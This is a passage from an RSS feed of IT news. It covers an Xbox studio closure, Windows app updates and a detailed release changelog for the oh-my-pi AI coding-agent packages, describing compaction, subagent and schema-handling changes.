href="https://appleinsider.com/articles/26/06/16/amazon-slashes-m5-macbook-air-with-24gb-ram-1tb-ssd-to-1329?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244670?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft and Xbox are closing South of Midnight developer Compulsion Games — it was just hiring for a "fascinating, intriguing, brand new IP"]]></title>
<description><![CDATA[As Microsoft and Xbox prepare for a huge business reset, it reportedly has plans to shut down South of Midnight developer Compulsion Games.]]></description>
<link>https://tsecurity.de/de/3599935/windows-tipps/microsoft-and-xbox-are-closing-south-of-midnight-developer-compulsion-games-it-was-just-hiring-for-a-fascinating-intriguing-brand-new-ip/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599935/windows-tipps/microsoft-and-xbox-are-closing-south-of-midnight-developer-compulsion-games-it-was-just-hiring-for-a-fascinating-intriguing-brand-new-ip/</guid>
<pubDate>Mon, 15 Jun 2026 20:01:30 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[As Microsoft and Xbox prepare for a huge business reset, it reportedly has plans to shut down South of Midnight developer Compulsion Games.]]></content:encoded>
</item>
<item>
<title><![CDATA[Xbox turmoil continues with a studio closure and executive departures]]></title>
<description><![CDATA[Last week, Xbox boss Asha Sharma sent a memo warning of an Xbox "reset" ahead of expected layoffs, and today, Kotaku reported that Xbox plans to shut down Compulsion Games, the studio behind South of Midnight. Since taking over in February, Sharma has made some big decisions, including cutting th...]]></description>
<link>https://tsecurity.de/de/3599818/it-nachrichten/xbox-turmoil-continues-with-a-studio-closure-and-executive-departures/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599818/it-nachrichten/xbox-turmoil-continues-with-a-studio-closure-and-executive-departures/</guid>
<pubDate>Mon, 15 Jun 2026 19:19:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Last week, Xbox boss Asha Sharma sent a memo warning of an Xbox "reset" ahead of expected layoffs, and today, Kotaku reported that Xbox plans to shut down Compulsion Games, the studio behind South of Midnight. Since taking over in February, Sharma has made some big decisions, including cutting the price of Xbox Game Pass […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft Updates Six Windows' Apps.  'Photos' Gets Watermarks for Copilot Images (Off by Default)]]></title>
<description><![CDATA[Microsoft dropped "massive" updates for six stock Windows apps, reports the "Microsoft enthusiast" site Neowin. 

Here's some of their more interesting highlights for Clock, Media Player, Calculator, Voice Recorder, Photos, and Paint: 

The Photos app (version 2026.11060.2004.0):
 
 AI watermarki...]]></description>
<link>https://tsecurity.de/de/3597749/it-security-nachrichten/microsoft-updates-six-windows-apps-photos-gets-watermarks-for-copilot-images-off-by-default/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597749/it-security-nachrichten/microsoft-updates-six-windows-apps-photos-gets-watermarks-for-copilot-images-off-by-default/</guid>
<pubDate>Mon, 15 Jun 2026 01:25:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft dropped "massive" updates for six stock Windows apps, reports the "Microsoft enthusiast" site Neowin. 

Here's some of their more interesting highlights for Clock, Media Player, Calculator, Voice Recorder, Photos, and Paint: 

The Photos app (version 2026.11060.2004.0):
 
 AI watermarking — "AI-generated or edited images can now carry a visible Copilot watermark. You choose Never, Always, or Ask Every Time in Settings, with a confirmation when saving. The watermarking is off by default in settings."

Calculator (version 11.2605.9.0):
 More accurate square-root results. "Fixed rare cases where a calculation that should equal zero (like sqrt(2.25) — 1.5) returned a tiny leftover value instead...." 

Reliable launch after upgrading. "Fixed an issue where upgrading from much older versions could leave outdated settings that stopped the app from opening..."


The Clock app (version 11.2605.9.0):
 "Timers keep counting after they hit zero — When a timer runs out, it now keeps counting up (for example, -00:27:31) so you can see how far past the time you've gone..." 
 "Correct sun and moon icons during midnight sun — Fixed an icon that wrongly showed a moon during all-day daylight in polar regions... " 
 "No more double announcements — Screen readers no longer read the timer value twice."



Media Player (version 11.2605.14.0). 

"Playlists need a name — You can no longer accidentally save a playlist with a blank name."
<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Microsoft+Updates+Six+Windows'+Apps.++'Photos'+Gets+Watermarks+for+Copilot+Images+(Off+by+Default)%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F06%2F14%2F2312247%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F06%2F14%2F2312247%2Fmicrosoft-updates-six-windows-apps-photos-gets-watermarks-for-copilot-images-off-by-default%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/06/14/2312247/microsoft-updates-six-windows-apps-photos-gets-watermarks-for-copilot-images-off-by-default?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v15.11.0]]></title>
<description><![CDATA[@oh-my-pi/pi-agent-core
Breaking Changes

Removed compaction/index.ts re-export of snapcompact helpers, so snapcompact utilities are no longer available from the agent compaction barrel and should be imported from @oh-my-pi/snapcompact
Removed the convertToLlm alias export from compaction/message...]]></description>
<link>https://tsecurity.de/de/3589080/tools/v15110/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589080/tools/v15110/</guid>
<pubDate>Thu, 11 Jun 2026 00:25:07 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>@oh-my-pi/pi-agent-core</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Removed <code>compaction/index.ts</code> re-export of snapcompact helpers, so snapcompact utilities are no longer available from the agent compaction barrel and should be imported from <code>@oh-my-pi/snapcompact</code></li>
<li>Removed the <code>convertToLlm</code> alias export from <code>compaction/messages</code> — it duplicated <code>defaultConvertToLlm</code> under a second name. Import <code>defaultConvertToLlm</code> (array form) or the new <code>convertMessageToLlm</code> (single-message form) instead</li>
</ul>
<h3>Added</h3>
<ul>
<li>Added <code>convertMessageToLlm()</code>: the single-message core transformer behind <code>defaultConvertToLlm()</code>. Embedders with app-specific message roles should handle their own roles and delegate every core role (<code>user</code>/<code>developer</code>/<code>assistant</code>/<code>toolResult</code>/<code>custom</code>/<code>hookMessage</code>/<code>branchSummary</code>/<code>compactionSummary</code>) to it instead of duplicating the conversion — a duplicated <code>compactionSummary</code> case is how snapcompact frames once silently dropped off provider requests</li>
<li>Added <code>pruneSupersededToolResults()</code> and the opt-in <code>PruneConfig.supersedeKey</code> hook so harnesses can prune stale tool results superseded by a newer read of the same file; superseded results are pruned ahead of age-based victims during overflow pruning and replaced with a <code>[Superseded by a newer read of this file]</code> placeholder. Without the new config, <code>pruneToolOutputs()</code> behavior is unchanged.</li>
<li>Added <code>readToolSupersedeKey()</code> implementing the read-tool path/selector grammar (selector-free reads supersede range reads of the same file; URL-scheme paths exempt). Pruning honors prompt-cache economics: per-turn prunes only fire when the post-candidate suffix is small or the cache is cold (idle gap).</li>
<li>Added the <code>snapcompact</code> compaction strategy via <code>@oh-my-pi/snapcompact</code>: instead of an LLM summary, discarded history is printed onto dense bitmap frames and re-attached to the compaction summary message as image blocks. <code>CompactionSummaryMessage</code> gains an optional <code>images</code> field, <code>estimateTokens()</code> charges per attached frame, and frames persist under <code>preserveData.snapcompact</code> with an 8-frame middle-out eviction budget.</li>
<li>Snapcompact frames are now rendered in a provider-aware shape (<code>SNAPCOMPACT_SHAPES</code> + <code>resolveSnapcompactShape(api)</code>), following the snapcompact 200k-token monolithic evals: Anthropic-family and unknown APIs get <code>8x8r-bw</code> (unscii-8 square cells, black ink, every line printed twice with the copy on a pale highlight band — read at F1 parity with raw text at ~2x lower cost and the most refusal-robust), Google gets <code>8x8r-sent</code> (sentence-hue ink, ~2.9x cheaper), and OpenAI gets <code>6x6u-sent</code> (unscii Lanczos-stretched to 6x6 cells — OpenAI bills a flat ~2.9k tokens per image, so frame count is the only cost lever) with <code>detail: "original"</code> on the frame images. <code>snapcompactCompact()</code> accepts <code>model</code>/<code>shape</code> options, frames persist their shape metadata, mixed-shape archives (provider switches, legacy 5x8 frames) are flagged in the reading instructions, and <code>snapcompactGeometry()</code>/<code>renderSnapcompactFrame()</code> now take a shape</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Compaction and branch-summary file lists are now a single <code>&lt;files&gt;</code> tag instead of <code>&lt;read-files&gt;</code>/<code>&lt;modified-files&gt;</code>: paths render as the grouped, prefix-folded directory tree the find/search tools emit (<code># dir/</code> headers, bare basenames), each annotated <code>(Read)</code>, <code>(Write)</code>, or <code>(RW)</code> — modified files that were also read get <code>(RW)</code>. Legacy tags in summaries written by earlier versions are still stripped and self-heal on the next compaction</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed queued steering messages being drained into an externally aborted run: interrupting mid-tool execution (e.g. Enter with a pending steer) dequeued the steer into the dying run — it landed in history without a response and the post-abort resume saw an empty queue, so the agent stopped instead of continuing. Steering/follow-up/aside queue polls are now skipped once the run's abort signal fires, leaving the queue intact for <code>Agent.continue()</code>.</li>
<li>Fixed <code>&lt;read-files&gt;</code> compaction lists recording the same file once per line-range/raw selector (<code>src/foo.ts:50-200</code>, <code>:raw</code>, <code>:1-50:raw</code>, …): read-tool selectors are now stripped before tracking, so reads dedupe to the base path and match their write/edit path when splitting read-only vs modified lists. Selector-polluted lists stored by earlier compactions self-heal on the next compaction. <code>readToolSupersedeKey()</code> now shares the same splitter (<code>splitReadSelector()</code>), gaining the <code>..</code> range alias and <code>L</code>-prefix forms it previously missed.</li>
<li>Fixed <code>estimateTokens()</code> undercounting thinking-heavy assistant messages on replay: <code>thinkingSignature</code> payloads (OpenAI Responses encrypted reasoning items, Anthropic signed thinking blocks, etc.) and <code>redactedThinking.data</code> are now charged alongside the visible thinking text, so the local estimate tracks provider-reported usage instead of straddling the threshold on every turn (<a href="https://github.com/can1357/oh-my-pi/issues/2275" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2275/hovercard">#2275</a>).</li>
</ul>
<h2>@oh-my-pi/pi-ai</h2>
<h3>Added</h3>
<ul>
<li>Added optional <code>ImageContent.detail</code> (<code>"auto" | "low" | "high" | "original"</code>): an OpenAI resolution hint forwarded by the <code>openai-responses</code> serializers (default stays <code>auto</code>) and by <code>openai-completions</code> for the values Chat Completions supports. <code>"original"</code> preserves native resolution — required for snapcompact frames, whose pixel-font glyphs do not survive the default downscale. Providers without a detail knob ignore the field.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed OpenRouter DeepSeek V4 strict tool schemas nesting <code>anyOf</code> inside the nullable wrapper for optional unions, which produced a branch without <code>type</code> and triggered OpenRouter's <code>Invalid tool parameters schema : field anyOf: missing field type</code> 400. (<a href="https://github.com/can1357/oh-my-pi/issues/2270" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2270/hovercard">#2270</a>)</li>
<li>Hardened strict tool-schema handling beyond the optional-union case: <code>enforceStrictSchema</code> now splices natively nested pure unions into the parent <code>anyOf</code> (only when the inner node carries no constraining siblings, since sibling keywords are conjunctive with <code>anyOf</code>), so source schemas with nested unions no longer produce type-less <code>anyOf</code> branches that strict upstream validators reject. (<a href="https://github.com/can1357/oh-my-pi/issues/2270" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2270/hovercard">#2270</a>)</li>
<li>Made the openai-completions non-strict retry reachable for <code>"mixed"</code> strict mode (previously gated to <code>all_strict</code>, i.e. Cerebras only) and taught it to recognize upstream tool-schema validation 400s (<code>Invalid tool parameters schema …</code>, <code>Invalid schema for function …</code>). A matching rejection now retries the request with base (non-strict) schemas and persists <code>strictToolsDisabled</code> on the provider session, so later requests skip the doomed strict attempt instead of paying a 400 + retry round-trip each turn. (<a href="https://github.com/can1357/oh-my-pi/issues/2270" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2270/hovercard">#2270</a>)</li>
<li>Cross-model <code>anthropic-messages → anthropic-messages</code> continuations now preserve prior assistant turns' reasoning chains end-to-end: every prior <code>thinking</code>/<code>redactedThinking</code> block survives (not just the latest surviving assistant), and third-party ↔ third-party replays keep their signatures intact so the reasoning chain stays signed for the next turn. Signatures are stripped (and any <code>redacted_thinking</code> sibling without a native landing spot is dropped) only when an official Anthropic endpoint is on either end of the replay — official Anthropic cryptographically binds reasoning signatures to its key+session+model, while compatible reasoning endpoints (Z.AI, DeepSeek, custom anthropic-messages providers configured via <code>models.yaml</code>) treat them as opaque continuation hints. Source-side official detection uses the canonical catalog provider id <code>"anthropic"</code> (assistant messages carry no <code>baseUrl</code>); target-side detection reuses the baked <code>compat.officialEndpoint</code> flag. Latest-turn byte-for-byte behavior (Anthropic's "thinking blocks in the latest assistant message cannot be modified" rule) and existing aborted/errored last-block sanitization are unchanged. (<a href="https://github.com/can1357/oh-my-pi/issues/2257" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2257/hovercard">#2257</a>, <a href="https://github.com/can1357/oh-my-pi/issues/2265" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2265/hovercard">#2265</a>)</li>
</ul>
<h2>@oh-my-pi/pi-catalog</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed <code>buildModel</code> so malformed explicit thinking metadata without <code>efforts</code> is treated as sparse input and inferred instead of crashing during model resolution (<a href="https://github.com/can1357/oh-my-pi/issues/2251" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2251/hovercard">#2251</a>).</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Removed the <code>resume</code> option from the <code>task</code> tool API and its resume execution path; continue work on finished subagents by sending follow-up messages via <code>irc</code> instead</li>
<li>Removed the <code>irc.enabled</code> setting: irc availability is now derived — the tool exists exactly when there is someone to message (the session can spawn subagents through <code>task</code>, or it is a subagent itself). A stale <code>irc.enabled</code> key in config is ignored</li>
<li>The <code>task</code> tool was reworked to always run spawns in the background as independent, persistent agents: results arrive as async job deliveries (block with <code>job poll</code> only when genuinely needed). The wire schema is now shape-swapped by the new <code>task.batch</code> setting (default on): <code>{ agent, context, tasks[] }</code> — one subagent per task item, per-item <code>isolated</code>, and a required shared <code>context</code> — or, when disabled, a flat single-spawn shape <code>{ agent, id?, description?, assignment, isolated? }</code> with shared background passed via <code>local://</code> files instead</li>
<li>Removed the <code>task.simple</code> setting and the task tool's per-call <code>schema</code> parameter outright: structured subagent output now comes only from the agent definition's <code>output</code> frontmatter or the inherited session schema, and ad-hoc structured workflows use eval <code>agent(prompt, schema)</code>. A stale <code>task.simple</code> key in config is migrated away</li>
<li>Reworked <code>irc</code> to <code>send</code>/<code>wait</code>/<code>inbox</code>/<code>list</code> ops over a per-agent mailbox bus: the blocking <code>awaitReply</code> auto-reply turn is removed — <code>send</code> is fire-and-forget with delivery receipts, and replies are real turns by the recipient observed via <code>wait</code> (or the <code>send</code> <code>await: true</code> sugar)</li>
<li>Removed the <code>context</code> argument from eval <code>agent()</code> in both the JS and Python preludes: pass shared background via a <code>local://</code> file referenced in the prompt</li>
<li>Replaced the standalone session-observer overlay with the Agent Hub: <code>app.session.observe</code> (<code>ctrl+s</code>) now opens the hub, whose chat view absorbed the observer's transcript renderer</li>
</ul>
<h3>Added</h3>
<ul>
<li>Snapcompact compaction now passes the session model so frames render in the provider-optimal shape (unscii <code>8x8r-bw</code> for Anthropic-family/unknown APIs, <code>8x8r-sent</code> for Google, Lanczos-stretched <code>6x6u-sent</code> with <code>detail: "original"</code> for OpenAI), per the snapcompact 200k-token evals</li>
<li>Added per-turn supersede pruning of stale <code>read</code> results: when a file is re-read, older copies of the same path/selector are pruned from context at cache-favorable moments (small suffix, idle gap, or alongside overflow pruning). Gated by the new <code>compaction.supersedeReads</code> setting (default on)</li>
<li>Added soft request budgets for task subagents (explore/quick_task 40, others 90, configurable via <code>task.softRequestBudget</code>, 0 disables): crossing the budget injects a one-time wrap-up steer into the child; crossing 1.5× aborts the run gracefully</li>
<li>Added cancelled/aborted subagent salvage: instead of <code>(no output)</code>, merged task results now carry the child's last activity snippet plus request/token stats, and per-child stats lines include request counts</li>
<li>Added a repeat-read notice to the <code>read</code> tool: the third and later reads of the same file in a session append a one-line note suggesting range re-reads or the context echoed in edit results</li>
<li>Added a hard inline byte cap (~50KB) at the bash and browser tool-result boundaries with head/tail elision and an <code>artifact://</code> footer for the full output, closing paths that previously let 100KB+ results land inline</li>
<li>Added the Agent Hub overlay (<code>ctrl+s</code>, <code>alt+a</code>, or double-tap left arrow on an empty editor): a live table of registered subagents (status, unread IRC count, current task, last activity) with per-agent chat — Enter opens a transcript + input line that steers a running agent, prompts an idle one, and revives a parked one; <code>r</code> revives and <code>x</code> aborts/releases the selected agent</li>
<li>Added the <code>snapcompact</code> compaction strategy (<code>compaction.strategy: "snapcompact"</code>): history is archived onto dense bitmap "snapcompact" frames a vision model reads back directly, instead of an LLM-generated summary — instant, free, and verbatim. Auto compaction (including overflow recovery) and manual <code>/compact</code> both honor it; falls back to context-full with a visible warning notice when the current model is text-only (e.g. Codex API surfaces) or when <code>/compact</code> is given custom instructions. Frames survive context rebuilds and later compactions (budget eviction is middle-out: the session-head frame is pinned); the expanded compaction message notes the attached frame count</li>
<li>Added a persistent subagent lifecycle: finished subagents stay live as <code>idle</code>, are parked to disk after <code>task.agentIdleTtlMs</code> (default 7 minutes; <code>0</code> keeps them live until exit), and are revived automatically when messaged or prompted from the Agent Hub</li>
<li>Added the <code>history://</code> protocol: <code>history://</code> lists every registered agent and <code>history://&lt;agentId&gt;</code> renders a concise markdown transcript (tool calls collapsed to one line each, thinking elided) for live and parked agents alike</li>
<li>Added an IRC mailbox bus with bounded per-agent inboxes: <code>irc</code> <code>wait</code> blocks until a matching message arrives, <code>inbox</code> drains or peeks pending messages, and sending to an idle or parked agent wakes or revives it for a real turn</li>
<li>Added a dedicated TUI renderer for the <code>irc</code> tool: directional send/receive headers with delivery-outcome coloring, quoted message bodies with expand-aware truncation, per-recipient receipt trees for broadcasts and failures, and status-badged peer listings with unread counts</li>
<li>Added the <code>task.batch</code> setting (default on): the task tool's batch shape <code>{ agent, context, tasks[] }</code> spawns one subagent per item — each its own independent background job with the normal idle/parked lifecycle and optional per-item isolation — and prepends the required shared <code>context</code> to every spawned subagent's system prompt; disabling it restores the flat single-spawn schema</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed task-tool sync execution to fan out multiple <code>tasks[]</code> items in parallel and return a merged result payload when no async job manager is available</li>
<li>Changed the compaction UX so the conversation no longer visually restarts: the TUI renders the full-history display transcript (<code>buildSessionContext({ transcript: true })</code>), with each compaction shown as a slim inline divider — <code>── 📷 compacted · ctrl+o ──</code> — at the point it fired; expanding (ctrl+o) reveals the summary and snapcompact frame count. Applies to live compaction, <code>/compact</code>, <code>/tree</code> navigation, and session resume</li>
<li>Changed <code>async.enabled</code> to gate async bash commands only — the <code>task</code> tool now runs asynchronously regardless of the setting</li>
<li>Changed <code>irc.timeoutMs</code> to be the default timeout for <code>irc</code> <code>wait</code> and <code>send</code> with <code>await: true</code></li>
<li>Moved the grouped path-tree helpers (<code>buildPathTree</code>, <code>walkPathTree</code>, find's grouped output formatter — now <code>formatGroupedPaths</code>) to <code>@oh-my-pi/pi-utils</code> so compaction summaries can render file lists with the same prefix-folded tree as find/search; <code>tools/find</code> no longer exports <code>formatFindGroupedOutput</code></li>
<li>Changed TTSR rule notifications to combine rules into one block: a multi-rule match renders <code>name: description</code> rows (collapsed view caps at 4 rules with a <code>+N more</code> hint, ctrl+o expands), and consecutive notifications merge into the previous block while it is still the live transcript tail</li>
</ul>
<h3>Removed</h3>
<ul>
<li>Removed the pre-initialization startup splash and input buffer, so commands typed during launch are no longer queued and are handled only after the interactive TUI initializes</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed <code>irc</code> live message delivery so successfully handed-off messages are no longer enqueued as mailbox mail, so they do not inflate unread <code>irc</code> counts</li>
<li>Fixed <code>irc send</code> with <code>await: true</code> to wait for a fresh reply to the current call instead of consuming previously buffered messages</li>
<li>Fixed main-session chat output to stop duplicating outbound <code>irc</code> sends from the main agent as relay cards</li>
<li>Fixed task-tool runtime compatibility so legacy flat <code>task</code> calls (<code>agent</code>, <code>assignment</code>) still execute under <code>task.batch</code> even though the wire schema is batch-first</li>
<li>Fixed the <code>job</code> tool's TUI preview leaking the model-facing <code>&lt;task-result&gt;</code> envelope for settled task jobs — the preview now shows the inner output body, and pretty-printed JSON bodies are flattened onto one line instead of previewing a lone <code>{</code></li>
<li>Fixed npm CLI distribution bundles by embedding the stats dashboard client bundle so dashboard assets are served in prebuilt installs</li>
<li>Fixed the <code>resolve</code> tool's result block turning white after the leading icon: the accent-styled symbol embedded a foreground reset inside the inverse-rendered line, dropping the block color for the rest of the row</li>
<li>Fixed the CLI smoke-test command to start the stats server and verify dashboard HTML is served, catching bundled-asset regressions</li>
<li>Added verification of a <code>&lt;div id="root"&gt;&lt;/div&gt;</code> and <code>index.js</code> in smoke-test dashboard responses</li>
<li>Restored the checkmark glyph on ask-tool custom answers and the multi-select "Done selecting" option, which a status-glyph sweep had swapped for the ask tool icon</li>
<li>Fixed the <code>thinking.autoPending</code> statusbar indicator using question-mark glyphs (<code>▣?</code>, nf-md-help_box, <code>[?]</code>) in every symbol preset, which made the auto-thinking pending state indistinguishable from a terminal missing-glyph fallback. Replaced with clear loading indicators (<code>⟳</code>, fa-circle-o-notch, <code>[~]</code>) (<a href="https://github.com/can1357/oh-my-pi/issues/2267" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2267/hovercard">#2267</a>).</li>
<li>Fixed <code>tab.screenshot({ save })</code> ignoring the save path's extension: an explicit <code>.webp</code>/<code>.jpg</code> destination received hardcoded PNG bytes behind a mismatched name. The full-res capture format is now derived from the save path (<code>png</code>/<code>jpeg</code>/<code>webp</code>, puppeteer-native), and the reported mime type follows the bytes actually written; unknown or missing extensions still capture PNG</li>
<li>Fixed an infinite <code>compaction.strategy: shake</code> auto-continue loop in thinking-heavy sessions: the post-shake check now uses the provider-anchored trigger metric (instead of a local estimate that undercounts <code>thinkingSignature</code> payloads) and only treats pressure as resolved when residual context lands inside an 80% recovery band, so shake reliably falls back to context-full compaction when it cannot create real headroom (<a href="https://github.com/can1357/oh-my-pi/issues/2275" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2275/hovercard">#2275</a>).</li>
</ul>
<h2>@oh-my-pi/hashline</h2>
<h3>Changed</h3>
<ul>
<li>Block-unresolved errors (<code>replace block N:</code> / <code>delete block N</code> / <code>insert after block N:</code> failing to resolve a syntactic block) now append a numbered preview of the file around the anchor line — same <code>*</code>-marked context rows the hash-mismatch error shows — so the offending line is visible without a re-read</li>
</ul>
<h2>@oh-my-pi/pi-natives</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Changed <code>renderSnapcompactPng(text, options)</code> to return a base64-encoded PNG <code>string</code> instead of a <code>Uint8Array</code></li>
</ul>
<h3>Added</h3>
<ul>
<li>Added dim-span ink toggles to <code>renderSnapcompactPng</code>: <code>U+000E</code>/<code>U+000F</code> in the input switch to a dim gray ink (palette index 9) and back without occupying a glyph cell, letting callers visually de-emphasize spans such as archived tool output</li>
<li>Added <code>renderSnapcompactPng(text, options)</code>: rasterizes pre-normalized text onto a square PNG in an eval-validated snapcompact shape. Options select the bundled font (<code>5x8</code> X.org BDF or <code>8x8</code> unscii-8, both public domain, shipped in <code>crates/pi-natives/src/fonts/</code>), the ink variant (<code>sent</code> six-hue sentence cycling or <code>bw</code> black), line repetition (each text line printed N times, copies on a pale highlight band), and a target cell size — cells differing from the font's natural cell render via Lanczos3 stretch into an anti-aliased RGB frame (e.g. the OpenAI-optimal 6x6 unscii shape); native-cell shapes encode as 4-bit indexed PNG. Replaces the JS rasterizer/PNG writer previously in <code>@oh-my-pi/pi-agent-core</code>.</li>
</ul>
<h2>@oh-my-pi/snapcompact</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Changed <code>renderSnapcompactFrame</code> output from <code>png: Uint8Array</code> to <code>data: string</code> base64, requiring consumers to read frame payloads from <code>frame.data</code></li>
</ul>
<h3>Added</h3>
<ul>
<li>Added new serialization options <code>toolResultMaxChars</code>, <code>toolArgMaxChars</code>, <code>toolCallMaxChars</code>, <code>truncateHeadRatio</code>, and <code>dimToolResults</code> to <code>snapcompactCompact</code>/<code>serializeSnapcompactConversation</code> so callers can tune how tool results and arguments are archived</li>
<li>Added exported default constants <code>SNAPCOMPACT_TOOL_RESULT_MAX_CHARS</code>, <code>SNAPCOMPACT_TOOL_ARG_MAX_CHARS</code>, <code>SNAPCOMPACT_TOOL_CALL_MAX_CHARS</code>, and <code>SNAPCOMPACT_TRUNCATE_HEAD_RATIO</code> for reuse when configuring truncation limits</li>
<li>Added provider-specific snapcompact frame-shape presets and shape helpers (<code>SNAPCOMPACT_SHAPES</code>, <code>resolveSnapcompactShape</code>, <code>isSnapcompactShape</code>) so callers can consistently select validated image-frame geometry for archive renders</li>
<li>Added <code>file-operations.md</code> and <code>snapcompact-summary.md</code> prompts to preserve file-read/write context and frame metadata in the compaction prompt flow</li>
<li>Added a full <code>packages/snapcompact/research</code> experiment and visualization suite for running snapcompact SQuAD studies, provider probes, and activation-style analyses</li>
<li>Added package-level TypeScript exports and publication config so consumers can import <code>@oh-my-pi/snapcompact</code> with typed access to snapcompact APIs</li>
<li>Published <code>@oh-my-pi/snapcompact</code> as the reusable snapcompact compaction package, including bitmap-frame rendering helpers, archive helpers, and the local <code>snapcompactCompact()</code> strategy.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed truncation in archived tool output to keep both the beginning and end of long text using a configurable head/tail ratio instead of a single hard cut</li>
<li>Changed tool-result text rendering so archived tool results are shown in dim gray ink by default and the summary prompt notes that dim text is archived tool output</li>
<li>Changed <code>RenderedFrame</code> visible-character accounting so <code>chars</code> no longer includes invisible dim-control markers</li>
<li>Changed the file-operations summary block to a single <code>&lt;files&gt;</code> tag: one grouped, prefix-folded directory tree with per-file <code>(Read)</code>/<code>(Write)</code>/<code>(RW)</code> markers, replacing the separate <code>&lt;read-files&gt;</code>/<code>&lt;modified-files&gt;</code> lists; <code>upsertSnapcompactFileOperations</code> takes the cumulative read set to distinguish <code>(RW)</code> from blind writes</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed frame rendering at archive chunk boundaries to reopen dim spans when a chunk ends inside a dimmed tool-result segment</li>
<li>Fixed message serialization to strip user- and assistant-provided dim markers so only renderer-generated dim spans can be applied</li>
</ul>
<h2>@oh-my-pi/omp-stats</h2>
<h3>Added</h3>
<ul>
<li>Added support for prebuilt npm bundle mode via <code>PI_BUNDLED</code>, allowing the stats server to use an embedded dashboard bundle in packaged CLI distributions</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed handling of legacy <code>embedded-client.generated.txt</code> placeholder content so it is treated as missing archive instead of being decoded into invalid bytes</li>
<li>Fixed ENOENT handling while scanning dashboard source/build directories so missing <code>client/</code> or <code>dist/client</code> trees no longer crash startup</li>
</ul>
<h2>@oh-my-pi/pi-tui</h2>
<h3>Added</h3>
<ul>
<li>Added support for asynchronous <code>onSubmit</code> handlers by allowing the callback to return a <code>Promise&lt;void&gt;</code></li>
</ul>
<h2>@oh-my-pi/pi-utils</h2>
<h3>Added</h3>
<ul>
<li>Added the <code>path-tree</code> module (<code>buildPathTree</code>, <code>walkPathTree</code>, <code>formatGroupedPaths</code>, <code>isUrlLikePath</code>), moved from the coding agent's grouped file output so compaction file lists can share the same prefix-folded directory-tree rendering; <code>formatGroupedPaths</code> gains an optional <code>annotate</code> callback for per-file suffixes</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed the <code>{{join}}</code> prompt helper joining with a literal two-character <code>\n</code> when templates pass <code>"\n"</code> as the separator — Handlebars string literals carry no escape processing. The separator now unescapes <code>\n</code>/<code>\t</code>, matching the <code>{{#list}}</code> helper's documented convention (visible as literal <code>\n</code> between paths in compaction <code>&lt;read-files&gt;</code> lists).</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix(ai): preserve 3p anthropic-messages reasoning chains across model swaps by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4634060202" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2266" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2266/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2266">#2266</a></li>
